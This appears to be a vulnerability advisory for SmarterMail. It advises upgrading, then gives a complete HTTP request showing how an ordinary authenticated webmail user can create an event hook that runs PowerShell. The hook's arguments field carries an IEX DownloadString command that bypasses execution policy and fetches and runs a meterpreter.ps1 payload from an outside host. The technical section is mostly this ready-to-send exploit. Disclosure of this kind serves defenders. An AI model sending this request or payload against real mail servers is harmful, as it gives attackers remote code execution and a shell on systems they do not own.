Advisory

Upgrade to the latest version of SmarterMail; https://www.smartertools.com/smartermail/downloads

Technical details

When authenticated as a “normal” webmail user it is possible to trigger a event-hook containing a Powershell download a meterpreter.ps1 file.

POST /api/v1/settings/event-hook HTTP/1.1
Host: test.local:9998
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.Content-Length: 1004
Origin: http://test.local:9998
Connection: close
Referer: http://test.local:9998/interface/root

{
  "actions":[{
    "constrained":true,
    "constraintFrequency":"00:00:00",
    "constraintKey":"",
    "defaultFrequencyInMinutes":0,
    "eventActionID":0,
    "inputs":[{
      "descriptionResourceId":"@EventInput_Process",
      "hidden":false,
      "inputType":0,
      "key":"process",
      "prefillKey":null,
      "required":false,
      "value":"powershell"
    },{
      "descriptionResourceId":"@EventInput_Arguments",
      "hidden":false,
      "inputType":0,
      "key":"arguments",
      "prefillKey":null,
      "required":false,
      "value":"-ExecutionPolicy Bypass -NoExit \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.233/meterpreter.ps1');\""
    }],
    "key":"CommandLineAction",
    "lastOccuredMapping":{},
    "lastOccuredUTC":"0001-01-01T00:00:00",
    "requires":1,
    "showVariables":true,
    "didTrigger":false,
    "id":"",
    "lastInput":{
      "descriptionResourceId":"@EventInput_Arguments",
      "hidden":true	,
      "inputType":0,
      "key":"arguments",
      "prefillKey":null,
      "required":false,
      "value":""
    }
  }],
  "actionsByKey":{},
  "conditions":[],
  "conditionsByKey":{},
  "enabled":true,
  "eventID":30000,
  "groupID":"",
  "isNew":true,
  "name":"_",
  "owner":""
}